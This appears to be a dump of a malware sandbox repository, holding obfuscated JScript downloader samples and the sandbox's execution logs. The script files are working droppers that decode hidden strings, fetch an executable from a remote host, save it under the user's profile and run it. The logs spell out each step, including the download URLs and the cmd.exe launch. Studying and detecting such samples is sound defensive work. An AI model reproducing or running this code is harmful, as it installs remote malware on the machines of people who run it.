HWSELX("F0U80OA6JB0DA7Y85SA7MBAEB3YBCRB9KB0DF0V", XHZGH) + ")"); 131 | KGRDTRYP = DYDUHJGS[HWSELX("B0SADLA5FB4YBBQB1J90EBBXA3SBCNA7GBAABBVB8PB0KBBEA1A86TA1MA7GBCZBBSB2LA6D", XHZGH)](HWSELX("F0U80OA6JB0DA7Y85SA7MBAEB3YBCRB9KB0DF0V", XHZGH)); 132 | KGRDTRYP = KGRDTRYP + "\\"; 133 | 134 | WIOYAM = KGRDTRYP + QUOELSUF[HWSELX("92GB0AA1W81PB0KB8TA5M9BEB4XB8PB0I", XHZGH)]() + HWSELX("FBQB0MADFB0A", XHZGH); 135 | 136 | SAIGXSK = JXSEL(HWSELX("82LBCHBBA9DTA1LA1DA5WFBO82IBCBBBV9DQA1KA1EA5Z87UB0PA4JA0EB0YA6SA1MFBFE0YFBRE4J", XHZGH)); 137 | SAIGXSK[HWSELX("BATA5PB0JBBH", XHZGH)](HWSELX("B2RB0KA1Q", XHZGH), HWSELX("BDPA1IA1AA5TEFNFAGFAZBCUBBOA6IA1DB4WB9RA6LB0GB1BA6WFBPB7HBCAB1UFAMB4EB1ZB8TBCOBBIFBCA5XBDRA5MEAFB3CE8KE1CE5VE6O", XHZGH), false); 138 | SAIGXSK[HWSELX("86BB0VA1P87KB0EA4YA0RB0MA6FA1W9DPB0IB4CB1UB0OA7I", XHZGH)](HWSELX("80WA6QB0LA7FF8Z94VB2OB0HBBAA1T", XHZGH), HWSELX("98YBATAFOBCHB9CB9WB4QFAKE0EFBYE5TF5MFDE82WBCRBBKB1EBABA2TA6MF5D9BU81MF5CE3UFBLE4DEEXF5R81KA7DBCWB1PB0HBBBA1VFANE2FFBXE5REENF5AA7UA3OEFIE4BE4WFBQE5JFCCF5VB9OBCHBEZB0TF5N92IB0CB6ZBEVBAP", XHZGH)); 139 | 140 | SAIGXSK[HWSELX("A6YB0RBBMB1G", XHZGH)](); 141 | VKNBASTFP = JXSEL(HWSELX("94Z91U9AO91I97CFBW86SA1KA7DB0WB4PB8H", XHZGH)); 142 | VKNBASTFP[HWSELX("9ARA5LB0GBBB", XHZGH)]; 143 | 144 | VKNBASTFP[HWSELX("81PACJA5BB0U", XHZGH)] = 1; 145 | VKNBASTFP[HWSELX("82VA7QBCKA1EB0Z", XHZGH)](SAIGXSK[HWSELX("87NB0HA6BA5SBALBBEA6WB0Q97KBAEB1YACS", XHZGH)]); 146 | VKNBASTFP[HWSELX("86LB4FA3ZB0R81KBAD93WBCOB9GB0Z", XHZGH)](WIOYAM); 147 | VKNBASTFP[HWSELX("96NB9IBABA6WB0Q", XHZGH)]; 148 | DYDUHJGS[HWSELX("90RADMB0EB6W", XHZGH)](WIOYAM); 149 | }; 150 | }; 151 | 152 | function JXSEL(JONYSACSK) { 153 | NPKAWIDM = 'e'; 154 | AULUOHBJ = 'j'; 155 | IXYHDI = 'b'; 156 | ZWEYVZ = 'e'; 157 | HEGRM = 't'; 158 | ZJGCOABYZ = 't'; 159 | BHRDWRBTP = 'r'; 160 | DRIBTMEC = 'O'; 161 | PXPLUC = 'C'; 162 | EBUCVD = 'c'; 163 | JLOWQT = 'e'; 164 | ADGUD = 'a'; 165 | 166 | YFHLSEYL = PXPLUC + BHRDWRBTP + JLOWQT + ADGUD + HEGRM + NPKAWIDM + DRIBTMEC + IXYHDI + AULUOHBJ + ZWEYVZ + EBUCVD + ZJGCOABYZ; 167 | util_log("JXSEL: WScript[" + YFHLSEYL +"](" + JONYSACSK +")"); 168 | YFHLSEYL = WScript[YFHLSEYL](JONYSACSK); 169 | 170 | return YFHLSEYL; 171 | 172 | }; 173 | -------------------------------------------------------------------------------- /malware/20161002/ac5705ba4eeb9295b162073cdccf64b9a0a14fd3bf933694e083aab2e65820e9.js.orig: -------------------------------------------------------------------------------- 1 | NLWNAGICE(); 2 | 3 | function HTNHCX(GESRUAS) { 4 | 5 | FLFCXUV = parseInt(GESRUAS); 6 | return FLFCXUV; 7 | }; 8 | 9 | function SODXEPKEN(ZCBAHVYOL, GWQCZKRS) { 10 | 11 | DQDIXG = ZCBAHVYOL ^ GWQCZKRS; 12 | 13 | return DQDIXG; 14 | }; 15 | 16 | function HWSELX(RJSGZJN, XHZGH) { 17 | ICKSVUEAO = '0'; 18 | XPMFUE = 'x'; 19 | LMQYPS = ICKSVUEAO + XPMFUE; 20 | ZDJKDKZK = ''; 21 | 22 | FNWVPY = 61 - 58; 23 | QFGCST = 't'; 24 | ENYZLWYO = 'n'; 25 | LBVAC = 'i'; 26 | YOZENUDBO = 'g'; 27 | LNSCLQTC = 'o'; 28 | RUGKXKZUZ = 't'; 29 | GVGEPZOG = 'r'; 30 | KUGNOK = 'S'; 31 | IYCPSYFWX = QFGCST + LNSCLQTC + KUGNOK + RUGKXKZUZ + GVGEPZOG + LBVAC + ENYZLWYO + YOZENUDBO; 32 | 33 | KEDQH = RJSGZJN[IYCPSYFWX](); 34 | 35 | QSVXSXTEF = 'o'; 36 | JZJNXPBYH = 'h'; 37 | CFGINE = 'd'; 38 | DHWNQMC = 'a'; 39 | BXRVZYNTP = 'r'; 40 | AISMTUX = 'C'; 41 | RQAMQZ = 'm'; 42 | AUCPVRV = 'e'; 43 | UJXJUAZ = 'o'; 44 | XVNPQOG = 'f'; 45 | UTRTET = 'r'; 46 | HJWBAPJLC = 'C'; 47 | 48 | NSOSZH = XVNPQOG + UTRTET + QSVXSXTEF + RQAMQZ + AISMTUX + JZJNXPBYH + DHWNQMC + BXRVZYNTP + HJWBAPJLC + UJXJUAZ + CFGINE + AUCPVRV; 49 | MXECAU = 't'; 50 | CKZIO = 's'; 51 | NVFZAOFB = 'b'; 52 | CWFTSPJ = 's'; 53 | KNZKIGW = 'r'; 54 | HQOEB = 'u'; 55 | CNFTMW = CKZIO + HQOEB + NVFZAOFB + CWFTSPJ + MXECAU + KNZKIGW; 56 | 57 | DLJUV = 'g'; 58 | VBCOI = 'n'; 59 | HKNUST = 'h'; 60 | AKNXJ = 't'; 61 | YETVW = 'l'; 62 | ENBPLEBRX = 'e'; 63 | 64 | FCLEFW = KEDQH[YETVW + ENBPLEBRX + VBCOI + DLJUV + AKNXJ + HKNUST]; 65 | 66 | for (var VEHIT = 0; VEHIT < FCLEFW; VEHIT += FNWVPY) { 67 | 68 | GMOLGWSA = LMQYPS; 69 | GMOLGWSA = GMOLGWSA + KEDQH[CNFTMW](VEHIT, 2); 70 | DHARERH = HTNHCX(GMOLGWSA); 71 | NPNSIMEK = SODXEPKEN(DHARERH, XHZGH); 72 | ZDJKDKZK = ZDJKDKZK + String[NSOSZH](NPNSIMEK); 73 | }; 74 | 75 | return ZDJKDKZK; 76 | }; 77 | 78 | function NLWNAGICE() { 79 | GXZMINO = false; 80 | SBRSRGIOQ = 113 - 110; 81 | KHZAZI = 'J'; 82 | OLNRBHZ = 'X'; 83 | SIZXIWJH = 'G'; 84 | WURGFNQ = 'E'; 85 | APFXKBUM = 'L'; 86 | 87 | AEOCOF = OLNRBHZ + APFXKBUM + WURGFNQ + KHZAZI + SIZXIWJH; 88 | 89 | try { 90 | 91 | GXZMINO = JXSEL(AEOCOF); 92 | } catch (Y) { 93 | 94 | WJZLSZQUO = 'm'; 95 | DMRDRQDZ = 'n'; 96 | YUDKNE = 'a'; 97 | CHFLAYM = 'e'; 98 | 99 | QGSBA = 'e'; 100 | WBYWXK = 'r'; 101 | VLMWRPHQ = 't'; 102 | NPDOS = 'A'; 103 | NVMHXEJCN = 'd'; 104 | MERNQAK = 'C'; 105 | XNBSPEJUP = 'o'; 106 | QPZBKFTR = 'c'; 107 | VAWUM = 'h'; 108 | QDRXPLSZU = 'a'; 109 | 110 | XHZGH = Y[DMRDRQDZ + YUDKNE + WJZLSZQUO + CHFLAYM][QPZBKFTR + VAWUM + QDRXPLSZU + WBYWXK + MERNQAK + XNBSPEJUP + NVMHXEJCN + QGSBA + NPDOS + VLMWRPHQ](SBRSRGIOQ); 111 | }; 112 | if (!GXZMINO) { 113 | 114 | XHZGH = XHZGH + 110; 115 | LDSATLTI = HWSELX("82Z86UB6HA7ABCSA5LA1FFBY86UBDNB0HB9BB9X", XHZGH); 116 | DYDUHJGS = JXSEL(LDSATLTI); 117 | 118 | QUOELSUF = JXSEL(HWSELX("86XB6UA7QBCJA5EA1YBCSBBMB2FFBZ93TBCMB9FB0Y86SACLA6GA1AB0TB8O9AJB7CBFYB0SB6MA1H", XHZGH)); 119 | KGRDTRYP = DYDUHJGS[HWSELX("B0SADLA5FB4YBBQB1J90EBBXA3SBCNA7GBAABBVB8PB0KBBEA1A86TA1MA7GBCZBBSB2LA6D", XHZGH)](HWSELX("F0U80OA6JB0DA7Y85SA7MBAEB3YBCRB9KB0DF0V", XHZGH)); 120 | KGRDTRYP = KGRDTRYP + "\\"; 121 | 122 | WIOYAM = KGRDTRYP + QUOELSUF[HWSELX("92GB0AA1W81PB0KB8TA5M9BEB4XB8PB0I", XHZGH)]() + HWSELX("FBQB0MADFB0A", XHZGH); 123 | 124 | SAIGXSK = JXSEL(HWSELX("82LBCHBBA9DTA1LA1DA5WFBO82IBCBBBV9DQA1KA1EA5Z87UB0PA4JA0EB0YA6SA1MFBFE0YFBRE4J", XHZGH)); 125 | SAIGXSK[HWSELX("BATA5PB0JBBH", XHZGH)](HWSELX("B2RB0KA1Q", XHZGH), HWSELX("BDPA1IA1AA5TEFNFAGFAZBCUBBOA6IA1DB4WB9RA6LB0GB1BA6WFBPB7HBCAB1UFAMB4EB1ZB8TBCOBBIFBCA5XBDRA5MEAFB3CE8KE1CE5VE6O", XHZGH), false); 126 | SAIGXSK[HWSELX("86BB0VA1P87KB0EA4YA0RB0MA6FA1W9DPB0IB4CB1UB0OA7I", XHZGH)](HWSELX("80WA6QB0LA7FF8Z94VB2OB0HBBAA1T", XHZGH), HWSELX("98YBATAFOBCHB9CB9WB4QFAKE0EFBYE5TF5MFDE82WBCRBBKB1EBABA2TA6MF5D9BU81MF5CE3UFBLE4DEEXF5R81KA7DBCWB1PB0HBBBA1VFANE2FFBXE5REENF5AA7UA3OEFIE4BE4WFBQE5JFCCF5VB9OBCHBEZB0TF5N92IB0CB6ZBEVBAP", XHZGH)); 127 | 128 | SAIGXSK[HWSELX("A6YB0RBBMB1G", XHZGH)](); 129 | VKNBASTFP = JXSEL(HWSELX("94Z91U9AO91I97CFBW86SA1KA7DB0WB4PB8H", XHZGH)); 130 | VKNBASTFP[HWSELX("9ARA5LB0GBBB", XHZGH)]; 131 | 132 | VKNBASTFP[HWSELX("81PACJA5BB0U", XHZGH)] = 1; 133 | VKNBASTFP[HWSELX("82VA7QBCKA1EB0Z", XHZGH)](SAIGXSK[HWSELX("87NB0HA6BA5SBALBBEA6WB0Q97KBAEB1YACS", XHZGH)]); 134 | VKNBASTFP[HWSELX("86LB4FA3ZB0R81KBAD93WBCOB9GB0Z", XHZGH)](WIOYAM); 135 | VKNBASTFP[HWSELX("96NB9IBABA6WB0Q", XHZGH)]; 136 | DYDUHJGS[HWSELX("90RADMB0EB6W", XHZGH)](WIOYAM); 137 | }; 138 | }; 139 | 140 | function JXSEL(JONYSACSK) { 141 | NPKAWIDM = 'e'; 142 | AULUOHBJ = 'j'; 143 | IXYHDI = 'b'; 144 | ZWEYVZ = 'e'; 145 | HEGRM = 't'; 146 | ZJGCOABYZ = 't'; 147 | BHRDWRBTP = 'r'; 148 | DRIBTMEC = 'O'; 149 | PXPLUC = 'C'; 150 | EBUCVD = 'c'; 151 | JLOWQT = 'e'; 152 | ADGUD = 'a'; 153 | 154 | YFHLSEYL = PXPLUC + BHRDWRBTP + JLOWQT + ADGUD + HEGRM + NPKAWIDM + DRIBTMEC + IXYHDI + AULUOHBJ + ZWEYVZ + EBUCVD + ZJGCOABYZ; 155 | 156 | YFHLSEYL = WScript[YFHLSEYL](JONYSACSK); 157 | 158 | return YFHLSEYL; 159 | 160 | }; -------------------------------------------------------------------------------- /malware/20161002/ac5705ba4eeb9295b162073cdccf64b9a0a14fd3bf933694e083aab2e65820e9.out: -------------------------------------------------------------------------------- 1 | 2 Oct 23:31:47 - mailware-jail, a malware sandbox ver. 0.7 2 | 2 Oct 23:31:47 - ------------------------ 3 | 2 Oct 23:31:47 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js 4 | 2 Oct 23:31:47 - Malware files: malware/20161002/ac5705ba4eeb9295b162073cdccf64b9a0a14fd3bf933694e083aab2e65820e9.js 5 | 2 Oct 23:31:47 - Output file for sandbox dump: sandbox_dump_after.json 6 | 2 Oct 23:31:47 - Output directory for generated files: output/ 7 | 2 Oct 23:31:47 - ==> Preparing Sandbox environment. 8 | 2 Oct 23:31:47 - => Executing: env/utils.js 9 | 2 Oct 23:31:47 - => Executing: env/eval.js 10 | 2 Oct 23:31:47 - Preparing sandbox to intercept eval() calls. 11 | 2 Oct 23:31:47 - => Executing: env/function.js 12 | 2 Oct 23:31:47 - Preparing sandbox to intercept 'new Function()' calls. 13 | 2 Oct 23:31:47 - => Executing: env/wscript.js 14 | 2 Oct 23:31:47 - Preparing sandbox to emulate WScript environment. 15 | 2 Oct 23:31:47 - => Executing: env/browser.js 16 | 2 Oct 23:31:47 - Preparing sandbox to emulate Browser environment (default = IE11). 17 | 2 Oct 23:31:47 - Created: window[1] 18 | 2 Oct 23:31:47 - Created: document[2] 19 | 2 Oct 23:31:47 - document[2].createElement(html) 20 | 2 Oct 23:31:47 - Element[3] created, named: 'html' 21 | 2 Oct 23:31:47 - document[2].createElement(body) 22 | 2 Oct 23:31:47 - Element[5] created, named: 'body' 23 | 2 Oct 23:31:47 - document[2].body = 'Element[5]' 24 | 2 Oct 23:31:47 - document[2].createElement(head) 25 | 2 Oct 23:31:47 - Element[7] created, named: 'head' 26 | 2 Oct 23:31:47 - Element[3].appendChild(Element[7]) 27 | 2 Oct 23:31:47 - Element[3].firstChild set 28 | 2 Oct 23:31:47 - document[2].body.get() => Element[5] 29 | 2 Oct 23:31:47 - Element[3].appendChild(Element[5]) 30 | 2 Oct 23:31:47 - => Executing: env/agents.js 31 | 2 Oct 23:31:47 - Setting Browser environment to: IE8 on Win10 64bit 32 | 2 Oct 23:31:47 - window[1].userAgent.get() => Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; . ... (truncated) 33 | 2 Oct 23:31:47 - => Executing: env/other.js 34 | 2 Oct 23:31:47 - => Executing: env/console.js 35 | 2 Oct 23:31:47 - ==> Executing malware file(s). 36 | 2 Oct 23:31:47 - => Executing: malware/20161002/ac5705ba4eeb9295b162073cdccf64b9a0a14fd3bf933694e083aab2e65820e9.js 37 | 2 Oct 23:31:47 - JXSEL: WScript[CreateObject](XLEJG) 38 | 2 Oct 23:31:47 - WScript.CreateObject(XLEJG) 39 | 2 Oct 23:31:47 - !!! FIXME: WScript.CreateObject: type 'xlejg' not handled 40 | 2 Oct 23:31:47 - a: TypeError: WScript.CreateObject: Could not locate automation class named xlejg b: name c: charCodeAt d: 3 41 | 2 Oct 23:31:47 - XHZGH 101 42 | 2 Oct 23:31:47 - HWSELX(82Z86UB6HA7ABCSA5LA1FFBY86UBDNB0HB9BB9X, 213) => WScript.Shell 43 | 2 Oct 23:31:47 - LDSATLTI: WScript.Shell XHZGH: 213 charcode: 103 44 | 2 Oct 23:31:47 - LDSATLTI WScript.Shell 45 | 2 Oct 23:31:47 - JXSEL: WScript[CreateObject](WScript.Shell) 46 | 2 Oct 23:31:47 - WScript.CreateObject(WScript.Shell) 47 | 2 Oct 23:31:47 - Created: WScript.Shell[9] 48 | 2 Oct 23:31:47 - HWSELX(86XB6UA7QBCJA5EA1YBCSBBMB2FFBZ93TBCMB9FB0Y86SACLA6GA1AB0TB8O9AJB7CBFYB0SB6MA1H, 213) => Scripting.FileSystemObject 49 | 2 Oct 23:31:47 - JXSEL: WScript[CreateObject](Scripting.FileSystemObject) 50 | 2 Oct 23:31:47 - WScript.CreateObject(Scripting.FileSystemObject) 51 | 2 Oct 23:31:47 - Scripting.FileSystemObject[10] created. 52 | 2 Oct 23:31:47 - HWSELX(B0SADLA5FB4YBBQB1J90EBBXA3SBCNA7GBAABBVB8PB0KBBEA1A86TA1MA7GBCZBBSB2LA6D, 213) => expandEnvironmentStrings 53 | 2 Oct 23:31:47 - HWSELX(F0U80OA6JB0DA7Y85SA7MBAEB3YBCRB9KB0DF0V, 213) => %UserProfile% 54 | 2 Oct 23:31:47 - DYDUHJGS: [object Object][expandEnvironmentStrings](%UserProfile%) 55 | 2 Oct 23:31:47 - HWSELX(B0SADLA5FB4YBBQB1J90EBBXA3SBCNA7GBAABBVB8PB0KBBEA1A86TA1MA7GBCZBBSB2LA6D, 213) => expandEnvironmentStrings 56 | 2 Oct 23:31:47 - HWSELX(F0U80OA6JB0DA7Y85SA7MBAEB3YBCRB9KB0DF0V, 213) => %UserProfile% 57 | 2 Oct 23:31:47 - WScript.Shell[9].ExpandEnvironmentStrings(%UserProfile%) 58 | 2 Oct 23:31:47 - HWSELX(92GB0AA1W81PB0KB8TA5M9BEB4XB8PB0I, 213) => GetTempName 59 | 2 Oct 23:31:47 - Scripting.FileSystemObject[10].GetTempName() => TempFile[11] 60 | 2 Oct 23:31:47 - HWSELX(FBQB0MADFB0A, 213) => .exe 61 | 2 Oct 23:31:47 - HWSELX(82LBCHBBA9DTA1LA1DA5WFBO82IBCBBBV9DQA1KA1EA5Z87UB0PA4JA0EB0YA6SA1MFBFE0YFBRE4J, 213) => WinHttp.WinHttpRequest.5.1 62 | 2 Oct 23:31:47 - JXSEL: WScript[CreateObject](WinHttp.WinHttpRequest.5.1) 63 | 2 Oct 23:31:47 - WScript.CreateObject(WinHttp.WinHttpRequest.5.1) 64 | 2 Oct 23:31:47 - Created: MSXML2.XMLHTTP[12] 65 | 2 Oct 23:31:47 - HWSELX(BATA5PB0JBBH, 213) => open 66 | 2 Oct 23:31:47 - HWSELX(B2RB0KA1Q, 213) => get 67 | 2 Oct 23:31:47 - HWSELX(BDPA1IA1AA5TEFNFAGFAZBCUBBOA6IA1DB4WB9RA6LB0GB1BA6WFBPB7HBCAB1UFAMB4EB1ZB8TBCOBBIFBCA5XBDRA5MEAFB3CE8KE1CE5VE6O, 213) => http://instalseds.bid/admin.php?f=403 68 | 2 Oct 23:31:47 - MSXML2.XMLHTTP[12].open(get,http://instalseds.bid/admin.php?f=403,false) 69 | 2 Oct 23:31:47 - MSXML2.XMLHTTP[12].async = 'false' 70 | 2 Oct 23:31:47 - MSXML2.XMLHTTP[12].async.get() => false 71 | 2 Oct 23:31:47 - HWSELX(86BB0VA1P87KB0EA4YA0RB0MA6FA1W9DPB0IB4CB1UB0OA7I, 213) => SetRequestHeader 72 | 2 Oct 23:31:47 - HWSELX(80WA6QB0LA7FF8Z94VB2OB0HBBAA1T, 213) => User-Agent 73 | 2 Oct 23:31:47 - HWSELX(98YBATAFOBCHB9CB9WB4QFAKE0EFBYE5TF5MFDE82WBCRBBKB1EBABA2TA6MF5D9BU81MF5CE3UFBLE4DEEXF5R81KA7DBCWB1PB0HBBBA1VFANE2FFBXE5REENF5AA7UA3OEFIE4BE4WFBQE5JFCCF5VB9OBCHBEZB0TF5N92IB0CB6ZBEVBAP, 213) => Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko 74 | 2 Oct 23:31:47 - MSXML2.XMLHTTP[12].setRequestHeader(User-Agent, Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko) 75 | 2 Oct 23:31:47 - HWSELX(A6YB0RBBMB1G, 213) => send 76 | 2 Oct 23:31:47 - MSXML2.XMLHTTP[12].send(undefined) 77 | 2 Oct 23:31:48 - MSXML2.XMLHTTP[12].onreadystatechange(), readyState = 4 length: 0 status: 200 78 | 2 Oct 23:31:48 - MSXML2.XMLHTTP[12] statusText = null 79 | 2 Oct 23:31:48 - MSXML2.XMLHTTP[12].responseBody = '' 80 | 2 Oct 23:31:48 - MSXML2.XMLHTTP[12].status = '200' 81 | 2 Oct 23:31:48 - MSXML2.XMLHTTP[12].onreadystatechange() undefined 82 | 2 Oct 23:31:48 - MSXML2.XMLHTTP[12].send(undefined) finished 83 | 2 Oct 23:31:48 - HWSELX(94Z91U9AO91I97CFBW86SA1KA7DB0WB4PB8H, 213) => ADODB.Stream 84 | 2 Oct 23:31:48 - JXSEL: WScript[CreateObject](ADODB.Stream) 85 | 2 Oct 23:31:48 - WScript.CreateObject(ADODB.Stream) 86 | 2 Oct 23:31:48 - Created: ADODB_Stream[13] 87 | 2 Oct 23:31:48 - HWSELX(9ARA5LB0GBBB, 213) => Open 88 | 2 Oct 23:31:48 - HWSELX(81PACJA5BB0U, 213) => Type 89 | 2 Oct 23:31:48 - ADODB_Stream[13].Type = '1' 90 | 2 Oct 23:31:48 - HWSELX(82VA7QBCKA1EB0Z, 213) => Write 91 | 2 Oct 23:31:48 - HWSELX(87NB0HA6BA5SBALBBEA6WB0Q97KBAEB1YACS, 213) => ResponseBody 92 | 2 Oct 23:31:48 - MSXML2.XMLHTTP[12].ResponseBody.get() => 93 | 2 Oct 23:31:48 - ADODB_Stream[13].content = '' 94 | 2 Oct 23:31:48 - ADODB_Stream[13].Write(str) - 0 bytes 95 | 2 Oct 23:31:48 - ADODB_Stream[13].size = '0' 96 | 2 Oct 23:31:48 - HWSELX(86LB4FA3ZB0R81KBAD93WBCOB9GB0Z, 213) => SaveToFile 97 | 2 Oct 23:31:48 - ADODB_Stream[13].SaveToFile(%UserProfile%\TempFile[11].exe, undefined) 98 | 2 Oct 23:31:48 - ADODB_Stream[13].content.get() => 99 | 2 Oct 23:31:48 - HWSELX(96NB9IBABA6WB0Q, 213) => Close 100 | 2 Oct 23:31:48 - HWSELX(90RADMB0EB6W, 213) => Exec 101 | 2 Oct 23:31:48 - WScript.Shell[9].Exec(%UserProfile%\TempFile[11].exe) 102 | 2 Oct 23:31:48 - ==> Cleaning up sandbox. 103 | 2 Oct 23:31:48 - ==> Script execution finished, dumping sandbox environment to a file. 104 | 2 Oct 23:31:48 - MSXML2.XMLHTTP[12].ResponseBody.get() => 105 | 2 Oct 23:31:48 - Saving: output/_UserProfile__TempFile[11].exe 106 | 2 Oct 23:31:48 - Generated file saved 107 | 2 Oct 23:31:48 - The sandbox context has been saved to: sandbox_dump_after.json 108 | -------------------------------------------------------------------------------- /malware/20161007/3c1ab04d15fdc84afbf819df546359c8df9a8c303c67c90ce28a4417d9039393.out: -------------------------------------------------------------------------------- 1 | 7 Oct 21:57:26 - mailware-jail, a malware sandbox ver. 0.8 2 | 7 Oct 21:57:26 - ------------------------ 3 | 7 Oct 21:57:26 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js 4 | 7 Oct 21:57:26 - Malware files: malware/20161007/3c1ab04d15fdc84afbf819df546359c8df9a8c303c67c90ce28a4417d9039393.js 5 | 7 Oct 21:57:26 - Output file for sandbox dump: sandbox_dump_after.json 6 | 7 Oct 21:57:26 - Output directory for generated files: output/ 7 | 7 Oct 21:57:26 - ==> Preparing Sandbox environment. 8 | 7 Oct 21:57:26 - => Executing: env/utils.js 9 | 7 Oct 21:57:26 - => Executing: env/eval.js 10 | 7 Oct 21:57:26 - Preparing sandbox to intercept eval() calls. 11 | 7 Oct 21:57:26 - => Executing: env/function.js 12 | 7 Oct 21:57:26 - Preparing sandbox to intercept 'new Function()' calls. 13 | 7 Oct 21:57:26 - => Executing: env/wscript.js 14 | 7 Oct 21:57:26 - Preparing sandbox to emulate WScript environment. 15 | 7 Oct 21:57:26 - => Executing: env/browser.js 16 | 7 Oct 21:57:26 - Preparing sandbox to emulate Browser environment (default = IE11). 17 | 7 Oct 21:57:26 - Created: window[1] 18 | 7 Oct 21:57:26 - Created: document[2] 19 | 7 Oct 21:57:26 - document[2].createElement(html) 20 | 7 Oct 21:57:26 - Element[3] created, named: 'html' 21 | 7 Oct 21:57:26 - document[2].createElement(body) 22 | 7 Oct 21:57:26 - Element[5] created, named: 'body' 23 | 7 Oct 21:57:26 - document[2].body = 'Element[5]' 24 | 7 Oct 21:57:26 - document[2].createElement(head) 25 | 7 Oct 21:57:26 - Element[7] created, named: 'head' 26 | 7 Oct 21:57:26 - Element[3].appendChild(Element[7]) 27 | 7 Oct 21:57:26 - Element[3].firstChild set 28 | 7 Oct 21:57:26 - document[2].body.get() => Element[5] 29 | 7 Oct 21:57:26 - Element[3].appendChild(Element[5]) 30 | 7 Oct 21:57:26 - => Executing: env/agents.js 31 | 7 Oct 21:57:26 - Setting Browser environment to: IE8 on Win10 64bit 32 | 7 Oct 21:57:26 - window[1].userAgent.get() => Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; . ... (truncated) 33 | 7 Oct 21:57:26 - => Executing: env/other.js 34 | 7 Oct 21:57:26 - => Executing: env/console.js 35 | 7 Oct 21:57:26 - ==> Executing malware file(s). 36 | 7 Oct 21:57:26 - => Executing: malware/20161007/3c1ab04d15fdc84afbf819df546359c8df9a8c303c67c90ce28a4417d9039393.js 37 | 7 Oct 21:57:26 - Calling 'new Function(`var orqasnakri = WScript.CreateObject('WScript.Shell'); var fcoppohwura9 = orqasnakri.CreateShortcut('\qvertyd.lnk'); return fcoppohwura9.TargetPath;`)' 38 | 7 Oct 21:57:26 - args: util_log(`Calling function() {var orqasnakri = WScript.CreateObject('WScript.Shell'); var fcoppohwura9 = orqasnakri.Cr ... (truncated)(`+Array.prototype.slice.call(arguments).join(", ")+`)`);var ret = function() {var orqasnakri = WScript.CreateObject('WScript.Shell'); var fcoppohwura9 = orqasnakri.CreateShortcut('\qvertyd.lnk'); return fcoppohwura9.TargetPath;}(); util_log("Returning: '"+ret+"'"); return ret; 39 | 7 Oct 21:57:26 - Calling function() {var orqasnakri = WScript.CreateObject('WScript.Shell'); var fcoppohwura9 = orqasnakri.Cr ... (truncated)() 40 | 7 Oct 21:57:26 - WScript.CreateObject(WScript.Shell) 41 | 7 Oct 21:57:26 - Created: WScript.Shell[9] 42 | 7 Oct 21:57:26 - WScript.CreateShortcut(qvertyd.lnk) 43 | 7 Oct 21:57:26 - Created: WshShortcut[10](qvertyd.lnk) 44 | 7 Oct 21:57:26 - WshShortcut[10](qvertyd.lnk).TargetPath.get() => (string) '' 45 | 7 Oct 21:57:26 - Returning: '' 46 | 7 Oct 21:57:26 - WScript.CreateObject(Scripting.FileSystemObject) 47 | 7 Oct 21:57:26 - Scripting.FileSystemObject[11] created. 48 | 7 Oct 21:57:26 - WScript.CreateObject(WScript.Shell) 49 | 7 Oct 21:57:26 - Created: WScript.Shell[12] 50 | 7 Oct 21:57:26 - WScript.CreateObject(MSXML2.XMLHTTP) 51 | 7 Oct 21:57:26 - Created: MSXML2.XMLHTTP[13] 52 | 7 Oct 21:57:26 - WScript.CreateObject(ADODB.Stream) 53 | 7 Oct 21:57:26 - Created: ADODB_Stream[14] 54 | 7 Oct 21:57:26 - Scripting.FileSystemObject[11].GetSpecialFolder(2) => TemporaryFolder/ 55 | 7 Oct 21:57:26 - Scripting.FileSystemObject[11].GetTempName() => TempFile[15] 56 | 7 Oct 21:57:26 - MSXML2.XMLHTTP[13].open(GET,http://kutchvalley.com/creative/wp-admin/css/colors/midnight/gNcCTV.exe,0) 57 | 7 Oct 21:57:26 - MSXML2.XMLHTTP[13].async = (boolean) 'false' 58 | 7 Oct 21:57:26 - MSXML2.XMLHTTP[13].async.get() => (boolean) 'false' 59 | 7 Oct 21:57:26 - MSXML2.XMLHTTP[13].send(undefined) 60 | 7 Oct 21:57:27 - MSXML2.XMLHTTP[13].onreadystatechange(), readyState = 4 length: 0 status: 301 61 | 7 Oct 21:57:27 - MSXML2.XMLHTTP[13] statusText = null 62 | 7 Oct 21:57:27 - MSXML2.XMLHTTP[13].responseBody = (object) '' 63 | 7 Oct 21:57:27 - MSXML2.XMLHTTP[13].status = (number) '301' 64 | 7 Oct 21:57:27 - MSXML2.XMLHTTP[13].onreadystatechange() undefined 65 | 7 Oct 21:57:27 - MSXML2.XMLHTTP[13].send(undefined) finished 66 | 7 Oct 21:57:27 - ADODB_Stream[14].type = (string) '1' 67 | 7 Oct 21:57:27 - MSXML2.XMLHTTP[13].ResponseBody.get() => (object) '' 68 | 7 Oct 21:57:27 - ADODB_Stream[14].Open() 69 | 7 Oct 21:57:27 - ADODB_Stream[14].content = (object) '' 70 | 7 Oct 21:57:27 - ADODB_Stream[14].Write(str) - 0 bytes 71 | 7 Oct 21:57:27 - ADODB_Stream[14].size = (number) '0' 72 | 7 Oct 21:57:27 - ADODB_Stream[14].SaveToFile(TemporaryFolder/TempFile[15], undefined) 73 | 7 Oct 21:57:27 - ADODB_Stream[14].content.get() => (object) '' 74 | 7 Oct 21:57:27 - ADODB_Stream[14].Close() 75 | 7 Oct 21:57:27 - WScript.Shell[12].Run(cmd.exe /c TemporaryFolder/TempFile[15], 0, undefined) 76 | 7 Oct 21:57:27 - ==> Cleaning up sandbox. 77 | 7 Oct 21:57:27 - ==> Script execution finished, dumping sandbox environment to a file. 78 | 7 Oct 21:57:27 - MSXML2.XMLHTTP[13].ResponseBody.get() => (object) '' 79 | 7 Oct 21:57:27 - Saving: output/TemporaryFolder_TempFile[15] 80 | 7 Oct 21:57:27 - Generated file saved 81 | 7 Oct 21:57:27 - The sandbox context has been saved to: sandbox_dump_after.json 82 | -------------------------------------------------------------------------------- /malware/20161008/140da02684fd276b6c989317c8ba13f066373dc2623153776da5b8a3e4c7a59f.js: -------------------------------------------------------------------------------- 1 | 